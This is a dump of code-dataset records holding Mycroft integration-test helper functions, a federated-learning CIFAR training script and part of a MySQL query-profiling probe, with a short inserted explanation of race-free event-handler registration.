\"\"\"\n        if self.msg_type is None:\n            return self.wait_unspecific(timeout)\n        else:\n            return self.wait_specific(timeout)\n\n\ndef then_wait(msg_type, criteria_func, context, timeout=None):\n    \"\"\"Wait for a specific message type to fulfill a criterion.\n\n    Uses an event handler to avoid repeated polling.\n\n    Args:\n        msg_type: message type to watch\n        criteria_func: Function to determine if a message fulfilling the\n            test case has been found.\n        context: behave context\n        timeout: Time allowance for a message fulfilling the criteria; if\n            provided it will override the normal step timeout.\n\n    Returns:\n        (result (bool), debug (str)) Result containing status and debug\n        message.\n    \"\"\"\n    waiter = CriteriaWaiter(msg_type, criteria_func, context)\n    return waiter.wait(timeout)\n
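Note the ordering inside `wait_specific`: the bus handler is registered *before* the history scan. Doing it the other way round can drop a message that arrives between the scan and the registration. A toy illustration of why that ordering is race-free — the mini-bus below is hypothetical, not the Mycroft bus:

```python
class ToyBus:
    """Tiny in-process bus keeping both history and live handlers."""
    def __init__(self):
        self.history = []
        self.handlers = []
    def on(self, handler):
        self.handlers.append(handler)
    def emit(self, msg):
        self.history.append(msg)
        for handler in self.handlers:
            handler(msg)

bus = ToyBus()
seen = []
# 1) Subscribe first, so nothing emitted from now on can be missed...
bus.on(seen.append)
# 2) ...then replay history for anything that arrived earlier.
seen.extend(bus.history)
bus.emit("hello")
print(seen)  # ['hello'] -- no gap between historical and live messages
```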
\n\ndef then_wait_fail(msg_type, criteria_func, context, timeout=None):\n    \"\"\"Wait for a specified time, failing if the criteria is fulfilled.\n\n    Args:\n        msg_type: message type to watch\n        criteria_func: Function to determine if a message fulfilling the\n            test case has been found.\n        context: behave context\n        timeout: Time allowance for a message fulfilling the criteria\n\n    Returns:\n        tuple (bool, str) test status and debug output\n    \"\"\"\n    status, debug = then_wait(msg_type, criteria_func, context, timeout)\n    return not status, debug\n\n\ndef mycroft_responses(context):\n    \"\"\"Collect and format mycroft responses from context.\n\n    Args:\n        context: behave context to extract messages from.\n\n    Returns: (str) Mycroft responses including skill and dialog file\n    \"\"\"\n    responses = ''\n    messages = context.bus.get_messages('speak')\n    if len(messages) > 0:\n        responses = 'Mycroft responded with:\\n'\n        for m in messages:\n            responses += 'Mycroft: '\n            if 'meta' in m.data and 'dialog' in m.data['meta']:\n                responses += '{}.dialog'.format(m.data['meta']['dialog'])\n                responses += '({})\\n'.format(m.data['meta'].get('skill'))\n            responses += '\"{}\"\\n'.format(m.data['utterance'])\n    return responses\n\n\ndef print_mycroft_responses(context):\n    print(mycroft_responses(context))\n\n\ndef format_dialog_match_error(potential_matches, speak_messages):\n    \"\"\"Format the error message shown when an expected dialog was not spoken.\n\n    This is similar to the mycroft_responses function above. The difference\n    is that here the expected responses are passed in instead of making\n    a second loop through message bus messages.\n\n    Args:\n        potential_matches (list): one of the dialog files in this list was\n            expected to be spoken\n        speak_messages (list): \"speak\" event messages from the message bus\n            that don't match the list of potential matches.\n\n    Returns: (str) Message detailing the error to the user\n    \"\"\"\n    error_message = (\n        'Expected Mycroft to respond with one of:\\n'\n        f\"\\t{', '.join(potential_matches)}\\n\"\n        \"Actual response(s):\\n\"\n    )\n    if speak_messages:\n        for message in speak_messages:\n            meta = message.data.get(\"meta\")\n            if meta is not None:\n                if 'dialog' in meta:\n                    error_message += f\"\\tDialog: {meta['dialog']}\"\n                if 'skill' in meta:\n                    error_message += f\" (from {meta['skill']} skill)\\n\"\n            error_message += f\"\\t\\tUtterance: {message.data['utterance']}\\n\"\n    else:\n        error_message += \"\\tMycroft didn't respond\"\n\n    return error_message\n\n\ndef emit_utterance(bus, utterance):\n    \"\"\"Emit an utterance event on the message bus.\n\n    Args:\n        bus (InterceptAllBusClient): Bus instance to emit on\n        utterance (str): the utterance text to send\n    \"\"\"\n    bus.emit(Message('recognizer_loop:utterance',\n                     data={'utterances': [utterance],\n                           'lang': 'en-us',\n                           'session': '',\n                           'ident': time.time()},\n                     context={'client_name': 'mycroft_listener'}))\n\n\ndef wait_for_dialog(bus, dialogs, context=None, timeout=None):\n    \"\"\"Wait for one of the dialogs given as argument.\n\n    Args:\n        bus (InterceptAllBusClient): Bus instance to listen on\n        dialogs (list): list of acceptable dialogs\n        context (behave Context): optional context providing scenario timeout\n        timeout (int): how long to wait for the message, defaults to timeout\n            provided by context or 10 seconds\n    \"\"\"\n    if context:\n        timeout_duration = timeout or context.step_timeout\n    else:\n        timeout_duration = timeout or DEFAULT_TIMEOUT\n    wait_for_dialog_match(bus, dialogs, timeout_duration)\n\n\ndef wait_for_dialog_match(bus, dialogs, timeout=DEFAULT_TIMEOUT):\n    \"\"\"Match dialogs spoken to the specified list of expected dialogs.\n\n    Only one of the dialogs in the provided list needs to match for this\n    check to be 
successful.\n\n Args:\n bus (InterceptAllBusClient): Bus instance to listen on\n dialogs (list): list of acceptable dialogs\n timeout (int): how long to wait for the message, defaults to timeout\n provided by context or 10 seconds\n\n Returns:\n A boolean indicating if a match was found and the list of \"speak\"\n events found on the message bus during the matching process.\n \"\"\"\n match_found = False\n speak_messages = list()\n timeout_time = time.monotonic() + timeout\n while time.monotonic() < timeout_time:\n for message in bus.get_messages('speak'):\n speak_messages.append(message)\n dialog = message.data.get('meta', {}).get('dialog')\n if dialog in dialogs:\n wait_while_speaking()\n match_found = True\n break\n bus.clear_messages()\n if match_found:\n break\n time.sleep(1)\n\n return match_found, speak_messages\n\n\ndef wait_for_audio_service(context, message_type):\n \"\"\"Wait for audio.service message that matches type provided.\n\n May be play, stop, or pause messages\n\n Args:\n context (behave Context): optional context providing scenario timeout\n message_type (string): final component of bus message in form\n `mycroft.audio.service.{type}\n \"\"\"\n msg_type = 'mycroft.audio.service.{}'.format(message_type)\n\n def check_for_msg(message):\n return message.msg_type == msg_type, ''\n\n passed, debug = then_wait(msg_type, check_for_msg, context)\n\n if not passed:\n debug += mycroft_responses(context)\n if not debug:\n if message_type == 'play':\n message_type = 'start'\n debug = \"Mycroft didn't {} playback\".format(message_type)\n\n assert passed, debug\n","sub_path":"test/integrationtests/voight_kampff/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":11604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"599635752","text":"import os\nimport errno\nimport argparse\nimport sys\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.optimizers import Adam\n\nfrom data_utils import load_CIFAR_data, generate_partial_data, generate_bal_private_data\nfrom FedGD import FedGD\nfrom Neural_Networks import train_models, cnn_2layer_fc_model, cnn_3layer_fc_model\nfrom ResNet_v2 import ResNet, build_model\n\ndef parseArg():\n parser = argparse.ArgumentParser(description='FedMD, a federated learning framework. \\\n Participants are training collaboratively. 
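The matching loop above polls in one-second steps against a `time.monotonic()` deadline, which is immune to wall-clock adjustments (unlike `time.time()`). A generic version of that loop, with the predicate and poll interval as placeholders rather than anything Mycroft-specific:

```python
import time

def poll_until(predicate, timeout=10.0, interval=1.0):
    # time.monotonic() never jumps backwards, so the deadline is stable
    # even if the system clock is changed mid-test.
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if predicate():
            return True
        time.sleep(interval)
    return False

print(poll_until(lambda: True))                                # True immediately
print(poll_until(lambda: False, timeout=0.1, interval=0.05))   # False after ~0.1s
```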
')\n parser.add_argument('-conf', metavar='conf_file', nargs=1, \n help='the config file for FedMD.'\n )\n\n conf_file = os.path.abspath(\"conf/CIFAR_balance_conf.json\")\n \n if len(sys.argv) > 1:\n args = parser.parse_args(sys.argv[1:])\n if args.conf:\n conf_file = args.conf[0]\n return conf_file\n\n# CANDIDATE_MODELS = {\"2_layer_CNN\": cnn_2layer_fc_model,\n# \"3_layer_CNN\": cnn_3layer_fc_model}\n\nif __name__ == \"__main__\":\n conf_file = parseArg()\n with open(conf_file, \"r\") as f:\n conf_dict = eval(f.read())\n \n #n_classes = conf_dict[\"n_classes\"]\n model_config = conf_dict[\"models\"]\n pre_train_params = conf_dict[\"pre_train_params\"]\n model_saved_dir = conf_dict[\"model_saved_dir\"]\n model_saved_names = conf_dict[\"model_saved_names\"]\n is_early_stopping = conf_dict[\"early_stopping\"]\n public_classes = conf_dict[\"public_classes\"]\n private_classes = conf_dict[\"private_classes\"]\n n_classes = len(public_classes) + len(private_classes)\n \n emnist_data_dir = conf_dict[\"EMNIST_dir\"] \n N_parties = conf_dict[\"N_parties\"]\n N_samples_per_class = conf_dict[\"N_samples_per_class\"]\n \n N_rounds = conf_dict[\"N_rounds\"]\n N_alignment = conf_dict[\"N_alignment\"]\n N_private_training_round = conf_dict[\"N_private_training_round\"]\n private_training_batchsize = conf_dict[\"private_training_batchsize\"]\n N_logits_matching_round = conf_dict[\"N_logits_matching_round\"]\n logits_matching_batchsize = conf_dict[\"logits_matching_batchsize\"]\n \n \n result_save_dir = conf_dict[\"result_save_dir\"]\n\n \n del conf_dict, conf_file\n \n X_train_CIFAR10, y_train_CIFAR10, X_test_CIFAR10, y_test_CIFAR10 \\\n = load_CIFAR_data(data_type=\"CIFAR10\", \n standarized = True, verbose = True)\n \n public_dataset = {\"X\": X_train_CIFAR10, \"y\": y_train_CIFAR10}\n\n X_train_CIFAR100, y_train_CIFAR100, X_test_CIFAR100, y_test_CIFAR100 \\\n = load_CIFAR_data(data_type=\"CIFAR100\",\n standarized = True, verbose = True)\n \n # only use those CIFAR100 data whose y_labels belong to private_classes\n X_train_CIFAR100, y_train_CIFAR100 \\\n = generate_partial_data(X = X_train_CIFAR100, y= y_train_CIFAR100,\n class_in_use = private_classes,\n verbose = True)\n \n \n X_test_CIFAR100, y_test_CIFAR100 \\\n = generate_partial_data(X = X_test_CIFAR100, y= y_test_CIFAR100,\n class_in_use = private_classes,\n verbose = True)\n \n # relabel the selected CIFAR100 data for future convenience\n for index, cls_ in enumerate(private_classes):\n print(index, cls_)\n # print(y_train_CIFAR100 == cls_, len(y_train_CIFAR100 == cls_))\n y_train_CIFAR100[y_train_CIFAR100 == cls_] = index + len(public_classes)\n print(y_train_CIFAR100[y_train_CIFAR100 == index + len(public_classes)])\n y_test_CIFAR100[y_test_CIFAR100 == cls_] = index + len(public_classes)\n del index, cls_\n \n print(pd.Series(y_train_CIFAR100).value_counts())\n mod_private_classes = np.arange(len(private_classes)) + len(public_classes)\n # mod_private_classes = [10,11,12,13,14,15]\n \n print(\"=\"*60)\n #generate private data\n private_data, total_private_data\\\n =generate_bal_private_data(X_train_CIFAR100, y_train_CIFAR100, \n N_parties = N_parties, \n classes_in_use = mod_private_classes, \n N_samples_per_class = N_samples_per_class, \n data_overlap = False)\n print(\"=\"*60)\n X_tmp, y_tmp = generate_partial_data(X = X_test_CIFAR100, y= y_test_CIFAR100,\n class_in_use = mod_private_classes, \n verbose = True)\n private_test_data = {\"X\": X_tmp, \"y\": y_tmp}\n del X_tmp, y_tmp\n \n parties = []\n if model_saved_dir is None:\n parties = 
build_model(input_shape=(32,32,3), n_classes=n_classes, n_parties=N_parties)\n\n pre_train_result = train_models(parties, \n X_train_CIFAR10, y_train_CIFAR10, \n X_test_CIFAR10, y_test_CIFAR10,\n save_dir = model_saved_dir, save_names = model_saved_names,\n early_stopping = is_early_stopping,\n **pre_train_params\n )\n else:\n dpath = os.path.abspath(model_saved_dir)\n model_names = os.listdir(dpath)\n for name in model_names:\n tmp = None\n tmp = load_model(os.path.join(dpath ,name))\n parties.append(tmp)\n \n del X_train_CIFAR10, y_train_CIFAR10, X_test_CIFAR10, y_test_CIFAR10, \\\n X_train_CIFAR100, y_train_CIFAR100, X_test_CIFAR100, y_test_CIFAR100,\n \n fedgd = FedGD(parties, \n public_dataset = public_dataset,\n private_data = private_data, \n total_private_data = total_private_data,\n private_test_data = private_test_data,\n N_rounds = N_rounds,\n N_alignment = N_alignment, \n N_logits_matching_round = N_logits_matching_round,\n logits_matching_batchsize = logits_matching_batchsize, \n N_private_training_round = N_private_training_round, \n private_training_batchsize = private_training_batchsize)\n \n initialization_result = fedgd.init_result\n # pooled_train_result = fedgd.pooled_train_result\n \n collaboration_performance, collaboration_loss, record_generator_result = fedgd.collaborative_training()\n \n if result_save_dir is not None:\n save_dir_path = os.path.abspath(result_save_dir)\n #make dir\n try:\n os.makedirs(save_dir_path)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise \n \n \n with open(os.path.join(save_dir_path, 'pre_train_result.pkl'), 'wb') as f:\n pickle.dump(pre_train_result, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(os.path.join(save_dir_path, 'init_result.pkl'), 'wb') as f:\n pickle.dump(initialization_result, f, protocol=pickle.HIGHEST_PROTOCOL)\n # with open(os.path.join(save_dir_path, 'pooled_train_result.pkl'), 'wb') as f:\n # pickle.dump(pooled_train_result, f, protocol=pickle.HIGHEST_PROTOCOL)\n #with open(os.path.join(save_dir_path, 'col_performance_fedGD_'+str(N_rounds)+'_'+str(N_alignment)+'_'+str(N_samples_per_class*6)+'.pkl'), 'wb') as f:\n # pickle.dump(collaboration_performance, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(os.path.join(save_dir_path, 'col_performance_fedGD_' + str(N_logits_matching_round) + '_'\n + str(N_private_training_round) + '_'\n + str(N_rounds) + '_'\n + str(N_alignment) + '_'\n + str(N_samples_per_class * 6) + '.pkl'), 'wb') as f:\n pickle.dump(collaboration_performance, f, protocol=pickle.HIGHEST_PROTOCOL)\n","sub_path":"CIFAR_ResNet.py","file_name":"CIFAR_ResNet.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"514630459","text":"import utils.myLogger\nimport drivers.mysqldriver as mysql\nimport config.config\nimport multiprocessing\nimport csv\nimport time\nimport signal\n\nPROBE_SQL_LIST=[\n # \"select FIELD_07, sum(1) from TEST group by FIELD_07;\",\n # \"select * from (select * from (select * from (select * from TEST order by FIELD_09)as K order by FIELD_08) as a join (select FIELD_07 as FFIELD_07, FIELD_08 as FFIELD_08, FIELD_09 as FFIELD_09 from TEST) as b where a.FIELD_08=b.FFIELD_08) as c ORDER BY FIELD_09 LIMIT 10;\"\n]\n\nheaders = [\n 'plan', 'rowScan', 'rowOut', \n \n 'startTime', 'oTableTime', 'cTableTime', 'transHookTime', 'lockTime', 'initTime',\n 'optimizeTime', 'statTime', 'prepareTime', 'execTime', 'endTime','qEndTime', \n 'commitTime', 'crTmpTime', 'rmTmpTime', 'freeTime', 
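The result-saving block above uses the pre-Python-3.2 `errno.EEXIST` idiom; since 3.2, `os.makedirs(..., exist_ok=True)` (already used in other scripts in this set) expresses the same intent in one line. A small sketch of the save/load round trip — the directory name and payload are throwaway stand-ins, not the script's real outputs:

```python
import os
import pickle

save_dir = os.path.abspath("results_demo")   # hypothetical directory
os.makedirs(save_dir, exist_ok=True)         # no errno check needed

payload = {"accuracy": [0.1, 0.4, 0.7]}      # stand-in for a result dict
path = os.path.join(save_dir, "demo.pkl")
with open(path, "wb") as f:
    pickle.dump(payload, f, protocol=pickle.HIGHEST_PROTOCOL)

with open(path, "rb") as f:
    print(pickle.load(f))
```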
'cleanTime', \n\n 'Aborted_clients', 'Aborted_connects','Bytes_received','Bytes_sent','Connections',\n 'Com_insert','Com_rollback','Com_select','Com_set_option', 'Com_update','Com_delete',\n 'Binlog_cache_use','Binlog_cache_disk_use','Created_tmp_files','Created_tmp_tables','Error_log_buffered_bytes','Flush_commands',\n\n 'Handler_commit', 'Handler_delete', 'Handler_external_lock', 'Handler_mrr_init', \n 'Handler_prepare', 'Handler_read_first', 'Handler_read_key', 'Handler_read_last',\n 'Handler_read_next', 'Handler_read_rnd_next', 'Handler_rollback', 'Handler_update',\n 'Handler_write', \n\n 'Innodb_buffer_pool_pages_data', 'Innodb_buffer_pool_pages_dirty', 'Innodb_buffer_pool_pages_flushed', 'Innodb_buffer_pool_pages_free', 'Innodb_buffer_pool_pages_misc', 'Innodb_buffer_pool_pages_total', 'Innodb_buffer_pool_read_requests', 'Innodb_buffer_pool_reads', 'Innodb_buffer_pool_read_ahead_rnd', 'Innodb_buffer_pool_read_ahead', 'Innodb_buffer_pool_read_ahead_evicted', \n\n 'Innodb_data_fsyncs', 'Innodb_data_read', 'Innodb_data_reads', 'Innodb_data_writes', 'Innodb_data_written', 'Innodb_data_writes', 'Innodb_dblwr_pages_written', 'Innodb_dblwr_writes', \n\n 'Innodb_log_write_requests','Innodb_log_writes','Innodb_os_log_written','Innodb_pages_created','Innodb_pages_read','Innodb_page_size','Innodb_pages_written', \n \n 'Innodb_row_lock_time','Innodb_row_lock_time_avg','Innodb_row_lock_time_max','Innodb_row_lock_waits',\n\n 'Innodb_rows_deleted', 'Innodb_rows_inserted', 'Innodb_rows_read', 'Innodb_rows_updated', \n\n 'Open_tables', 'Opened_tables', 'Queries', 'Questions', \n\n 'Select_full_join', 'Select_full_range_join', 'Select_range', 'Select_scan', 'Sort_rows', 'Sort_range', 'Sort_scan', \n\n 'Table_open_cache_hits', 'Table_open_cache_misses', 'Table_open_cache_overflows', 'Threads_cached', 'Threads_connected', 'Threads_created',\n\n 'status_time', 'totalTime','timestamp'\n ]\nmysql = mysql.MysqlDriver()\nlogger = utils.myLogger.getCMDLogger()\n\n# 解析两次status形成输出\ndef parseStatus(resp1, resp2, time):\n dictTemp1 = {}\n dictTemp2 = {}\n dictStatus = {}\n for i in range(0,len(resp1)):\n dictTemp1[resp1[i]['Variable_name']] = resp1[i]['Value']\n for i in range(0,len(resp2)):\n dictTemp2[resp2[i]['Variable_name']] = resp2[i]['Value']\n \n dictStatus['Aborted_clients'] = int(dictTemp2['Aborted_clients']) - int(dictTemp1['Aborted_clients'])\n dictStatus['Aborted_connects'] = int(dictTemp2['Aborted_connects']) - int(dictTemp1['Aborted_connects'])\n dictStatus['Bytes_received'] = int(dictTemp2['Bytes_received']) - int(dictTemp1['Bytes_received'])\n dictStatus['Bytes_sent'] = int(dictTemp2['Bytes_sent']) - int(dictTemp1['Bytes_sent'])\n dictStatus['Connections'] = int(dictTemp2['Connections']) - int(dictTemp1['Connections'])\n \n dictStatus['Com_insert'] = int(dictTemp2['Com_insert']) - int(dictTemp1['Com_insert'])\n dictStatus['Com_rollback'] = int(dictTemp2['Com_rollback']) - int(dictTemp1['Com_rollback'])\n dictStatus['Com_select'] = int(dictTemp2['Com_select']) - int(dictTemp1['Com_select'])\n dictStatus['Com_set_option'] = int(dictTemp2['Com_set_option']) - int(dictTemp1['Com_set_option'])\n dictStatus['Com_update'] = int(dictTemp2['Com_update']) - int(dictTemp1['Com_update'])\n dictStatus['Com_delete'] = int(dictTemp2['Com_delete']) - int(dictTemp1['Com_delete'])\n \n dictStatus['Binlog_cache_use'] = int(dictTemp2['Binlog_cache_use']) - int(dictTemp1['Binlog_cache_use'])\n dictStatus['Binlog_cache_disk_use'] = int(dictTemp2['Binlog_cache_disk_use']) - int(dictTemp1['Binlog_cache_disk_use'])\n 
dictStatus['Created_tmp_files'] = int(dictTemp2['Created_tmp_files']) - int(dictTemp1['Created_tmp_files'])\n dictStatus['Created_tmp_tables'] = int(dictTemp2['Created_tmp_tables']) - int(dictTemp1['Created_tmp_tables'])\n dictStatus['Error_log_buffered_bytes'] = int(dictTemp2['Error_log_buffered_bytes']) - int(dictTemp1['Error_log_buffered_bytes'])\n dictStatus['Flush_commands'] = int(dictTemp2['Flush_commands']) - int(dictTemp1['Flush_commands'])\n \n dictStatus['Handler_commit'] = int(dictTemp2['Handler_commit']) - int(dictTemp1['Handler_commit'])\n dictStatus['Handler_delete'] = int(dictTemp2['Handler_delete']) - int(dictTemp1['Handler_delete'])\n dictStatus['Handler_external_lock'] = int(dictTemp2['Handler_external_lock']) - int(dictTemp1['Handler_external_lock'])\n dictStatus['Handler_mrr_init'] = int(dictTemp2['Handler_mrr_init']) - int(dictTemp1['Handler_mrr_init'])\n dictStatus['Handler_prepare'] = int(dictTemp2['Handler_prepare']) - int(dictTemp1['Handler_prepare'])\n dictStatus['Handler_read_first'] = int(dictTemp2['Handler_read_first']) - int(dictTemp1['Handler_read_first'])\n dictStatus['Handler_read_key'] = int(dictTemp2['Handler_read_key']) - int(dictTemp1['Handler_read_key'])\n dictStatus['Handler_read_last'] = int(dictTemp2['Handler_read_last']) - int(dictTemp1['Handler_read_last'])\n dictStatus['Handler_read_next'] = int(dictTemp2['Handler_read_next']) - int(dictTemp1['Handler_read_next'])\n dictStatus['Handler_read_rnd_next'] = int(dictTemp2['Handler_read_rnd_next']) - int(dictTemp1['Handler_read_rnd_next'])\n dictStatus['Handler_rollback'] = int(dictTemp2['Handler_rollback']) - int(dictTemp1['Handler_rollback'])\n dictStatus['Handler_update'] = int(dictTemp2['Handler_update']) - int(dictTemp1['Handler_update'])\n dictStatus['Handler_write'] = int(dictTemp2['Handler_write']) - int(dictTemp1['Handler_write'])\n \n dictStatus['Innodb_buffer_pool_pages_data'] = int(dictTemp2['Innodb_buffer_pool_pages_data']) - int(dictTemp1['Innodb_buffer_pool_pages_data'])\n dictStatus['Innodb_buffer_pool_pages_dirty'] = int(dictTemp2['Innodb_buffer_pool_pages_dirty']) - int(dictTemp1['Innodb_buffer_pool_pages_dirty'])\n dictStatus['Innodb_buffer_pool_pages_flushed'] = int(dictTemp2['Innodb_buffer_pool_pages_flushed']) - int(dictTemp1['Innodb_buffer_pool_pages_flushed'])\n dictStatus['Innodb_buffer_pool_pages_free'] = int(dictTemp2['Innodb_buffer_pool_pages_free']) - int(dictTemp1['Innodb_buffer_pool_pages_free'])\n dictStatus['Innodb_buffer_pool_pages_misc'] = int(dictTemp2['Innodb_buffer_pool_pages_misc']) - int(dictTemp1['Innodb_buffer_pool_pages_misc'])\n dictStatus['Innodb_buffer_pool_pages_total'] = int(dictTemp2['Innodb_buffer_pool_pages_total'])\n dictStatus['Innodb_buffer_pool_read_requests'] = int(dictTemp2['Innodb_buffer_pool_read_requests']) - int(dictTemp1['Innodb_buffer_pool_read_requests'])\n dictStatus['Innodb_buffer_pool_reads'] = int(dictTemp2['Innodb_buffer_pool_reads']) - int(dictTemp1['Innodb_buffer_pool_reads'])\n dictStatus['Innodb_buffer_pool_read_ahead_rnd'] = int(dictTemp2['Innodb_buffer_pool_read_ahead_rnd']) - int(dictTemp1['Innodb_buffer_pool_read_ahead_rnd'])\n dictStatus['Innodb_buffer_pool_read_ahead'] = int(dictTemp2['Innodb_buffer_pool_read_ahead']) - int(dictTemp1['Innodb_buffer_pool_read_ahead'])\n dictStatus['Innodb_buffer_pool_read_ahead_evicted'] = int(dictTemp2['Innodb_buffer_pool_read_ahead_evicted']) - int(dictTemp1['Innodb_buffer_pool_read_ahead_evicted'])\n \n dictStatus['Innodb_data_fsyncs'] = int(dictTemp2['Innodb_data_fsyncs']) - 
int(dictTemp1['Innodb_data_fsyncs'])\n dictStatus['Innodb_data_read'] = int(dictTemp2['Innodb_data_read']) - int(dictTemp1['Innodb_data_read'])\n dictStatus['Innodb_data_reads'] = int(dictTemp2['Innodb_data_reads']) - int(dictTemp1['Innodb_data_reads'])\n dictStatus['Innodb_data_writes'] = int(dictTemp2['Innodb_data_writes']) - int(dictTemp1['Innodb_data_writes'])\n dictStatus['Innodb_data_written'] = int(dictTemp2['Innodb_data_written']) - int(dictTemp1['Innodb_data_written'])\n dictStatus['Innodb_data_writes'] = int(dictTemp2['Innodb_data_writes']) - int(dictTemp1['Innodb_data_writes'])\n dictStatus['Innodb_dblwr_pages_written'] = int(dictTemp2['Innodb_dblwr_pages_written']) - int(dictTemp1['Innodb_dblwr_pages_written'])\n dictStatus['Innodb_dblwr_writes'] = int(dictTemp2['Innodb_dblwr_writes']) - int(dictTemp1['Innodb_dblwr_writes'])\n \n dictStatus['Innodb_log_write_requests'] = int(dictTemp2['Innodb_log_write_requests']) - int(dictTemp1['Innodb_log_write_requests'])\n dictStatus['Innodb_log_writes'] = int(dictTemp2['Innodb_log_writes']) - int(dictTemp1['Innodb_log_writes'])\n dictStatus['Innodb_os_log_written'] = int(dictTemp2['Innodb_os_log_written']) - int(dictTemp1['Innodb_os_log_written'])\n dictStatus['Innodb_pages_created'] = int(dictTemp2['Innodb_pages_created']) - int(dictTemp1['Innodb_pages_created'])\n dictStatus['Innodb_pages_read'] = int(dictTemp2['Innodb_pages_read']) - int(dictTemp1['Innodb_pages_read'])\n dictStatus['Innodb_page_size'] = int(dictTemp2['Innodb_page_size'])\n dictStatus['Innodb_pages_written'] = int(dictTemp2['Innodb_pages_written']) - int(dictTemp1['Innodb_pages_written'])\n\n dictStatus['Innodb_row_lock_time'] = int(dictTemp2['Innodb_row_lock_time']) - int(dictTemp1['Innodb_row_lock_time'])\n dictStatus['Innodb_row_lock_time_avg'] = int(dictTemp2['Innodb_row_lock_time_avg'])\n dictStatus['Innodb_row_lock_time_max'] = int(dictTemp2['Innodb_row_lock_time_max'])\n dictStatus['Innodb_row_lock_waits'] = int(dictTemp2['Innodb_row_lock_waits']) - int(dictTemp1['Innodb_row_lock_waits'])\n \n dictStatus['Innodb_rows_deleted'] = int(dictTemp2['Innodb_rows_deleted']) - int(dictTemp1['Innodb_rows_deleted'])\n dictStatus['Innodb_rows_inserted'] = int(dictTemp2['Innodb_rows_inserted']) - int(dictTemp1['Innodb_rows_inserted'])\n dictStatus['Innodb_rows_read'] = int(dictTemp2['Innodb_rows_read']) - int(dictTemp1['Innodb_rows_read'])\n dictStatus['Innodb_rows_updated'] = int(dictTemp2['Innodb_rows_updated']) - int(dictTemp1['Innodb_rows_updated'])\n \n dictStatus['Open_tables'] = int(dictTemp2['Open_tables']) - int(dictTemp1['Open_tables'])\n dictStatus['Opened_tables'] = int(dictTemp2['Opened_tables']) - int(dictTemp1['Opened_tables'])\n \n dictStatus['Queries'] = int(dictTemp2['Queries']) - int(dictTemp1['Queries'])\n dictStatus['Questions'] = int(dictTemp2['Questions']) - int(dictTemp1['Questions'])\n\n dictStatus['Select_full_join'] = int(dictTemp2['Select_full_join']) - int(dictTemp1['Select_full_join'])\n dictStatus['Select_full_range_join'] = int(dictTemp2['Select_full_range_join']) - int(dictTemp1['Select_full_range_join'])\n dictStatus['Select_range'] = int(dictTemp2['Select_range']) - int(dictTemp1['Select_range'])\n dictStatus['Select_scan'] = int(dictTemp2['Select_scan']) - int(dictTemp1['Select_scan'])\n dictStatus['Sort_rows'] = int(dictTemp2['Sort_rows']) - int(dictTemp1['Sort_rows'])\n dictStatus['Sort_range'] = int(dictTemp2['Sort_range']) - int(dictTemp1['Sort_range'])\n dictStatus['Sort_scan'] = int(dictTemp2['Sort_scan']) - 
int(dictTemp1['Sort_scan'])\n \n dictStatus['Table_open_cache_hits'] = int(dictTemp2['Table_open_cache_hits']) - int(dictTemp1['Table_open_cache_hits'])\n dictStatus['Table_open_cache_misses'] = int(dictTemp2['Table_open_cache_misses']) - int(dictTemp1['Table_open_cache_misses'])\n dictStatus['Table_open_cache_overflows'] = int(dictTemp2['Table_open_cache_overflows']) - int(dictTemp1['Table_open_cache_overflows'])\n \n dictStatus['Threads_cached'] = int(dictTemp2['Threads_cached']) - int(dictTemp1['Threads_cached'])\n dictStatus['Threads_connected'] = int(dictTemp2['Threads_connected']) - int(dictTemp1['Threads_connected'])\n dictStatus['Threads_created'] = int(dictTemp2['Threads_created']) - int(dictTemp1['Threads_created'])\n\n dictStatus['status_time'] = time\n return dictStatus\n\n\n# 把explain语句中的信息解析出来\n# 输出扫描行数和结果行数\ndef parseExplain(resp):\n dictExplain = {}\n rowsScan = 0\n rowsOut = 0\n plan = ''\n # logger.debug(resp)\n for i in range(0,len(resp)):\n dictExplain = resp[i]\n for k, v in dictExplain.items():\n if v == None:\n dictExplain[k] = 'None'\n rowsScan = rowsScan + dictExplain.get('rows')\n rowsOut = rowsOut + dictExplain.get('rows') * dictExplain.get('filtered')/100\n if plan!='':\n plan = plan + \"+\" + str(dictExplain.get('id')) + \"-\" + dictExplain.get('select_type') + \"-\" + dictExplain.get('table') + \"-\" + dictExplain.get('type') + \"-\" + dictExplain.get('key') + \"-\" + dictExplain.get('Extra').replace(' ','')\n else:\n plan = str(dictExplain.get('id')) + \"-\" + dictExplain.get('select_type') + \"-\" + dictExplain.get('table') + \"-\" + dictExplain.get('type') + \"-\" + dictExplain.get('key') + \"-\" + dictExplain.get('Extra').replace(' ','')\n dictExplain['rowsScan'] = rowsScan\n dictExplain['rowsOut'] = rowsOut\n dictExplain['plan'] = plan\n return dictExplain\n\n\n# 把Profile中的信息解析成字典输出\ndef parseProfile(resp):\n dictProfile = {}\n total = 0\n for i in range(0,len(resp)):\n try:\n dictProfile[resp[i]['Status']] = resp[i]['Duration'] + dictProfile[resp[i]['Status']]\n except: \n dictProfile[resp[i]['Status']] = resp[i]['Duration']\n total = total + resp[i]['Duration']\n dictProfile['totalTime'] = total\n return dictProfile\n\n\n# 分析当前数据库环境,执行sql并生成相应的sql分析\n# 生成结果压入队列,k为对应名称,v为对应值\ndef probe(i, queue):\n sql = PROBE_SQL_LIST[i]\n conn, cursor = mysql.getCursor()\n try:\n # 记录explain结果\n explainSql = \"explain \" + sql\n cursor.execute(explainSql)\n explainResp = cursor.fetchall()\n\n cursor.execute(\"show global status\")\n statusResp1 = cursor.fetchall()\n statusTimeBegin = time.time()\n\n # 记录profile结果\n cursor.execute(\"SET profiling=1;\")\n cursor.execute(sql)\n cursor.execute(\"show profile;\")\n profileResp = cursor.fetchall()\n\n statusTimeEnd = time.time()\n cursor.execute(\"show global status\")\n statusResp2 = cursor.fetchall()\n \n\n statusTime = statusTimeEnd - statusTimeBegin\n\n # 打包所有结果\n result_packer(i, statusResp1, statusResp2, explainResp, profileResp, statusTime, queue)\n except Exception:\n logger.debug(Exception.with_traceback())\n conn.rollback()\n finally:\n conn.close()\n cursor.close()\n\n\n# 打包器\ndef 